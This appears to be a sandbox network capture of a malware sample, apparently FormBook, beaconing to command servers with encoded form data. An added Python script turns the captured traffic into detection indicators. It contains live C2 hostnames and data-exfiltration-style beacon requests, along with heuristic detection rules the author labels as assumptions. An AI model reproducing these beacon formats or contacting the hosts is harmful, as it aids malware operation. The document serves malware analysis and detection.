                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 14:08:07.116379023 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGRlNjNhYjAtZjJhOC00NGExLWI4NjAtOWQ2MWYwZmJkOWVhIiwicGFnZV90aW1lIjoxNzI4NDc1Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.7 | 50003 | 199.59.243.227 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:09.274578094 CEST | 1719 | OUT | POST /reui/ HTTP/1.1
                                                                                                                Host: www.polarmuseum.info
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.polarmuseum.info
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.polarmuseum.info/reui/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 34 2b 31 43 59 36 6f 4d 33 30 55 57 54 4f 69 7a 33 39 78 42 58 74 4e 65 79 41 65 47 76 61 6c 4d 58 30 68 32 77 35 6a 6b 46 68 5a 6e 76 77 70 34 4c 31 4f 68 58 76 65 58 37 49 57 65 34 39 64 48 37 43 71 53 39 2b 6e 6c 57 67 69 74 38 4f 68 6c 70 66 2f 6f 51 48 4c 78 66 35 6d 68 5a 46 54 5a 49 66 35 42 65 32 78 30 4a 38 38 6f 38 4b 42 52 6f 4f 72 49 30 4d 4a 6e 75 47 58 79 69 6d 37 35 64 39 56 44 42 38 33 53 59 65 59 43 69 6d 63 4a 32 46 77 33 35 4a 62 5a 4c 6f 76 6e 4a 33 6c 4b 56 59 34 45 58 31 37 46 4f 71 66 54 4d 44 5a 74 64 79 50 6c 49 36 69 32 34 73 37 39 52 48 2b 69 76 59 57 62 50 4e 43 38 57 37 48 6d 43 47 51 38 49 6a 4c 66 42 59 47 6f 43 53 48 68 7a 6c 33 50 6e 64 34 43 77 32 6a 6c 32 42 6c 77 34 6d 31 69 36 73 45 55 68 65 76 6d 50 62 51 52 33 59 6d 72 52 51 2b 72 6f 4e 78 4e 34 70 46 78 76 4c 54 47 45 4c 4d 45 63 6c 6d 33 52 55 68 52 7a 77 37 42 52 38 50 39 41 71 66 6e 6c 35 37 45 6f 52 53 44 2f 57 33 78 36 6d 74 4c 37 2f 53 38 6f 34 55 69 7a 54 37 2f 48 30 63 6f 32 69 2b 2b 63 [TRUNCATED]
Oct 9, 2024 14:08:09.719027042 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                date: Wed, 09 Oct 2024 12:08:09 GMT
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                content-length: 1130
                                                                                                                x-request-id: 2ab7caa6-a568-4486-828d-33fcfaf678b8
                                                                                                                cache-control: no-store, max-age=0
                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==
                                                                                                                set-cookie: parking_session=2ab7caa6-a568-4486-828d-33fcfaf678b8; expires=Wed, 09 Oct 2024 12:23:09 GMT; path=/
                                                                                                                connection: close
                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 71 38 78 51 4d 41 51 59 76 4e 50 75 51 4d 69 77 50 30 55 51 31 58 4a 65 46 61 66 4a 75 5a 79 42 2f 2b 68 6d 37 57 70 35 41 74 5a 65 7a 58 2b 36 70 77 7a 50 6f 79 30 77 51 71 63 43 68 4d 39 6f 67 64 61 4c 43 48 62 74 78 4b 56 75 41 6a 62 74 47 41 47 47 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 14:08:09.719434977 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmFiN2NhYTYtYTU2OC00NDg2LTgyOGQtMzNmY2ZhZjY3OGI4IiwicGFnZV90aW1lIjoxNzI4NDc1Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.7 | 50004 | 199.59.243.227 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:12.033199072 CEST | 419 | OUT | GET /reui/?ZZY=86WVBsaKd0g/fiy38lBVTFNtYioQJ/XID2I2jzZkjXxxzqQXnIBLpzjUTcMxZ+VjRI6hFe2KzQRCqdeRoprBsBuO38R4j7pNa7/TdtnWnso/3MHserSUB0MZw7CHuHvixsEQagEWFuT7&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.polarmuseum.info
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:08:12.357306957 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                date: Wed, 09 Oct 2024 12:08:11 GMT
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                content-length: 1514
                                                                                                                x-request-id: 39f0cbbf-08c9-46d8-a2f1-688a231d2ecd
                                                                                                                cache-control: no-store, max-age=0
                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FOar148Y6dpljb5P/EMKRREMP8DjK9fpa+ABxyw7TbDwG9c3Uy6b3qMzKcWvU0ORd8v1SDWTIMxBFGAb43Nnhg==
                                                                                                                set-cookie: parking_session=39f0cbbf-08c9-46d8-a2f1-688a231d2ecd; expires=Wed, 09 Oct 2024 12:23:12 GMT; path=/
                                                                                                                connection: close
                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 46 4f 61 72 31 34 38 59 36 64 70 6c 6a 62 35 50 2f 45 4d 4b 52 52 45 4d 50 38 44 6a 4b 39 66 70 61 2b 41 42 78 79 77 37 54 62 44 77 47 39 63 33 55 79 36 62 33 71 4d 7a 4b 63 57 76 55 30 4f 52 64 38 76 31 53 44 57 54 49 4d 78 42 46 47 41 62 34 33 4e 6e 68 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_FOar148Y6dpljb5P/EMKRREMP8DjK9fpa+ABxyw7TbDwG9c3Uy6b3qMzKcWvU0ORd8v1SDWTIMxBFGAb43Nnhg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 14:08:12.357325077 CEST | 967 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzlmMGNiYmYtMDhjOS00NmQ4LWEyZjEtNjg4YTIzMWQyZWNkIiwicGFnZV90aW1lIjoxNzI4NDc1Nj


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.7 | 50005 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:25.758914948 CEST | 701 | OUT | POST /fvi9/ HTTP/1.1
                                                                                                                Host: www.consultarfacil.online
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.consultarfacil.online
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.consultarfacil.online/fvi9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 31 78 42 6a 72 41 48 39 63 6e 4a 2f 65 4b 66 79 37 68 37 59 74 36 57 66 76 31 7a 5a 38 75 31 6f 6d 74 38 56 65 50 39 72 79 68 2f 41 37 58 45 37 4c 78 63 53 57 64 2f 37 6a 6d 6b 75 41 67 53 72 48 6b 70 4a 4d 57 48 35 4a 4d 73 4c 64 56 34 63 65 72 50 74 56 4c 6d 7a 36 57 4d 58 77 32 6a 4c 63 6f 54 64 49 4e 69 7a 38 6c 32 70 45 31 38 77 7a 45 78 39 43 4a 6b 47 6f 6e 70 6b 35 37 45 71 2f 54 42 54 59 42 6a 42 77 57 73 42 45 52 52 39 77 61 6d 59 54 46 52 52 66 70 4c 4b 45 36 7a 4a 4d 78 47 6b 62 36 39 42 6b 6e 43 36 51 52 42 46 35 37 76 33 38 72 6c 30 78 4a 68 79 52 48 37 69 4e 6d 4e 45 4b 70 44 62 69 2f 79 38 38 51 78 42 67 3d 3d
                                                                                                                Data Ascii: ZZY=x1xBjrAH9cnJ/eKfy7h7Yt6Wfv1zZ8u1omt8VeP9ryh/A7XE7LxcSWd/7jmkuAgSrHkpJMWH5JMsLdV4cerPtVLmz6WMXw2jLcoTdINiz8l2pE18wzEx9CJkGonpk57Eq/TBTYBjBwWsBERR9wamYTFRRfpLKE6zJMxGkb69BknC6QRBF57v38rl0xJhyRH7iNmNEKpDbi/y88QxBg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 50006 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:28.310481071 CEST | 721 | OUT | POST /fvi9/ HTTP/1.1
                                                                                                                Host: www.consultarfacil.online
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.consultarfacil.online
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.consultarfacil.online/fvi9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 31 78 42 6a 72 41 48 39 63 6e 4a 35 4f 36 66 30 5a 4a 37 65 4e 36 52 61 76 31 7a 58 63 76 79 6f 6d 70 38 56 66 4c 74 72 67 56 2f 48 62 48 45 36 4b 78 63 65 32 64 2f 38 54 6d 34 7a 51 67 5a 72 48 6f 68 4a 49 53 48 35 4a 49 73 4c 66 64 34 66 74 44 49 73 46 4c 6b 6d 71 57 4b 5a 51 32 6a 4c 63 6f 54 64 4d 68 45 7a 38 74 32 6f 30 46 38 2f 32 6f 79 78 69 4a 6a 44 59 6e 70 79 35 37 41 71 2f 54 6f 54 61 30 4f 42 31 61 73 42 46 68 52 35 31 32 68 50 44 45 55 63 2f 6f 58 4b 6e 57 32 47 4a 4d 30 72 34 79 6a 4a 55 50 6d 32 47 4d 6a 66 62 33 44 70 74 54 65 77 7a 74 58 6c 33 61 4f 67 4d 69 56 4a 6f 64 69 45 56 61 59 78 75 78 31 58 53 50 33 33 46 33 47 78 54 61 72 6e 53 73 65 78 6e 72 55 36 6e 51 3d
                                                                                                                Data Ascii: ZZY=x1xBjrAH9cnJ5O6f0ZJ7eN6Rav1zXcvyomp8VfLtrgV/HbHE6Kxce2d/8Tm4zQgZrHohJISH5JIsLfd4ftDIsFLkmqWKZQ2jLcoTdMhEz8t2o0F8/2oyxiJjDYnpy57Aq/ToTa0OB1asBFhR512hPDEUc/oXKnW2GJM0r4yjJUPm2GMjfb3DptTewztXl3aOgMiVJodiEVaYxux1XSP33F3GxTarnSsexnrU6nQ=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 50007 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:30.859110117 CEST | 1734 | OUT | POST /fvi9/ HTTP/1.1
                                                                                                                Host: www.consultarfacil.online
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.consultarfacil.online
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.consultarfacil.online/fvi9/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 31 78 42 6a 72 41 48 39 63 6e 4a 35 4f 36 66 30 5a 4a 37 65 4e 36 52 61 76 31 7a 58 63 76 79 6f 6d 70 38 56 66 4c 74 72 67 4e 2f 41 74 4c 45 37 70 5a 63 66 32 64 2f 7a 44 6d 6f 7a 51 67 49 72 45 59 6c 4a 49 65 49 35 4d 55 73 4c 39 6c 34 49 73 44 49 69 31 4c 6b 6b 71 57 4c 58 77 33 2b 4c 63 34 50 64 49 42 45 7a 38 74 32 6f 33 4e 38 37 6a 45 79 7a 69 4a 6b 47 6f 6e 31 6b 35 37 6f 71 2f 4c 53 54 5a 5a 7a 42 47 53 73 41 6c 78 52 2f 58 75 68 51 7a 45 57 66 2f 6f 66 4b 6e 62 6d 47 4e 6c 4e 72 37 75 64 4a 58 76 6d 79 58 78 50 61 72 72 49 30 4d 66 45 37 6c 31 6d 72 33 53 65 69 4f 65 4b 4c 2f 4a 65 48 32 75 57 32 59 35 68 64 32 4b 4d 75 6c 2f 54 2f 67 4f 73 33 46 63 61 6c 33 72 55 68 51 36 4a 37 6a 4c 69 6c 64 73 51 61 53 55 59 32 59 53 4c 4c 79 78 50 31 38 76 52 37 72 65 66 6c 2f 4d 77 6d 71 43 49 52 47 66 64 63 74 5a 79 77 69 4b 55 39 49 38 67 47 44 7a 49 75 77 34 4a 54 34 38 52 58 6f 50 76 77 53 42 43 67 2f 4f 57 43 77 7a 53 70 49 63 59 5a 48 63 4e 44 51 44 57 65 4a 47 78 70 4c 4e 30 75 4e [TRUNCATED]
                                                                                                                Data Ascii: ZZY=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 [TRUNCATED]


Session ID: 36 | Source: 192.168.2.7:50008 | Destination: 3.33.130.190:80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:33.405251980 CEST | 424 | OUT | GET /fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.consultarfacil.online
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:08:33.861129999 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:08:33 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 38 33 5a 68 67 66 67 36 74 75 2f 66 6f 4d 47 61 31 72 64 34 47 38 6d 76 5a 38 4a 30 63 74 54 31 73 51 74 41 41 38 33 30 37 77 6c 36 66 70 58 6d 74 59 4e 67 53 30 68 34 37 68 50 63 74 58 59 7a 69 33 6b 72 41 4b 2b 54 75 4d 6b 38 4e 4e 4e 55 63 37 2f 7a 6c 69 7a 46 69 34 2b 75 4c 7a 6a 36 4a 65 49 39 48 4f 77 6e 76 4f 4d 6c 39 69 73 57 34 45 4d 2f 30 69 74 66 42 74 4f 38 2b 71 62 6f 74 75 53 4a 55 5a 31 76 49 32 54 52 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPctXYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1vI2TR&mHm0o=rrqhoH"}</script></head></html>
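The sessions above and below share one request shape: a POST to a four-character directory on the contacted host carrying a single form parameter (ZZY in this sample), an Origin and Referer that point back at that same host and path, the same hard-coded Android Chrome User-Agent on every request, and a follow-up GET that carries ZZY plus a second short parameter (mHm0o). The same POST sizes are sent to each host in turn, and the hosts answer differently: www.consultarfacil.online returns a JavaScript redirect to /lander, www.40wxd.top an nginx 404. The script below is an added example, not part of the Joe Sandbox report, that parses requests of this shape and reduces them to the host, path and parameter name a network detection rule would key on. The POST from session 37 and the GET from session 36 are embedded as captured; the benign control request, the indicator names, the four-character path check and the three-indicator threshold are this example's own constructions and assumptions drawn from this capture, not a published FormBook signature.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# User-Agent sent on every request in this capture.
CAPTURED_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) "
               "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 "
               "Mobile Safari/537.36")

# Session 37 POST and session 36 GET, copied from the capture above.
SAMPLE_POST = "\r\n".join([
    "POST /0cbg/ HTTP/1.1", "Host: www.40wxd.top", "Accept: */*",
    "Accept-Language: en-US,en", "Accept-Encoding: gzip, deflate",
    "Origin: http://www.40wxd.top", "Content-Length: 216",
    "Content-Type: application/x-www-form-urlencoded", "Connection: close",
    "Cache-Control: no-cache", "Referer: http://www.40wxd.top/0cbg/",
    "User-Agent: " + CAPTURED_UA, "",
    "ZZY=cc9ixEenPGeoARwuJvSfha7TUjdYAGaTpi7rJVyAFXyRkGTTjfXZIITHANvtkC058lUmTxf6"
    "EvY8kHjbkrOGbOrC3ko4+9y1wgmVweAtwp7YYTdzVFT1IvtwfSOP43gMwS/5dg5ya0sotv0/71v/"
    "UZ0x9lH2OtFPX2DJCnPgHXw1Lqh+Y3hp+FJpcco8aEELayYzBwQMy4FRX9diKg==",
])
SAMPLE_GET = "\r\n".join([
    "GET /fvi9/?ZZY=83Zhgfg6tu/foMGa1rd4G8mvZ8J0ctT1sQtAA8307wl6fpXmtYNgS0h47hPct"
    "XYzi3krAK+TuMk8NNNUc7/zlizFi4+uLzj6JeI9HOwnvOMl9isW4EM/0itfBtO8+qbotuSJUZ1v"
    "I2TR&mHm0o=rrqhoH HTTP/1.1",
    "Host: www.consultarfacil.online", "Accept: */*", "Accept-Language: en-US,en",
    "Connection: close", "User-Agent: " + CAPTURED_UA, "", "",
])
# Constructed benign control request (not from the capture).
BENIGN_GET = "\r\n".join(["GET /index.html HTTP/1.1", "Host: www.example.com",
                          "User-Agent: curl/8.4.0", "", ""])

PATH_RE = re.compile(r"^/[a-z0-9]{4}/$")  # /fvi9/, /0cbg/, /eysm/ in this capture


@dataclass
class Beacon:
    method: str
    host: str
    path: str
    params: list                     # parameter names in body (POST) or query (GET)
    indicators: list = field(default_factory=list)


def parse_request(raw: str) -> Beacon:
    """Split one raw HTTP/1.1 request into the fields the checks below use."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    query = body if method == "POST" else url.query
    params = [name for name, _ in parse_qsl(query, keep_blank_values=True)]
    beacon = Beacon(method, headers.get("host", ""), url.path, params)
    beacon.indicators = _indicators(beacon, headers)
    return beacon


def _indicators(b: Beacon, h: dict) -> list:
    """Indicator names are this example's own; each mirrors one trait of the capture."""
    found = []
    if h.get("user-agent") == CAPTURED_UA:
        found.append("captured-ua")
    if PATH_RE.match(b.path):
        found.append("4char-path")
    if b.method == "POST":
        origin = "http://" + b.host
        if (h.get("origin") == origin and h.get("referer") == origin + b.path
                and h.get("content-type") == "application/x-www-form-urlencoded"
                and len(b.params) == 1):
            found.append("self-referer-single-param-post")
    elif b.method == "GET" and len(b.params) == 2 and h.get("connection") == "close":
        found.append("two-param-get-beacon")
    return found


def is_suspect(b: Beacon, threshold: int = 3) -> bool:
    """Assumed threshold: all three traits present, as in every request captured here."""
    return len(b.indicators) >= threshold


def c2_profile(requests: list) -> dict:
    """host -> {(path, payload parameter name)} for the suspect requests only."""
    profile = {}
    for raw in requests:
        b = parse_request(raw)
        if is_suspect(b):
            profile.setdefault(b.host, set()).add((b.path, b.params[0]))
    return profile


if __name__ == "__main__":
    print(c2_profile([SAMPLE_POST, SAMPLE_GET, BENIGN_GET]))
```

On a proxy or IDS log, feed each reconstructed request text to `parse_request` and alert on `is_suspect`; a blocking rule should match on the (host, path, parameter name) tuple that `c2_profile` yields rather than on the parameter value, which is different in every request shown here.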


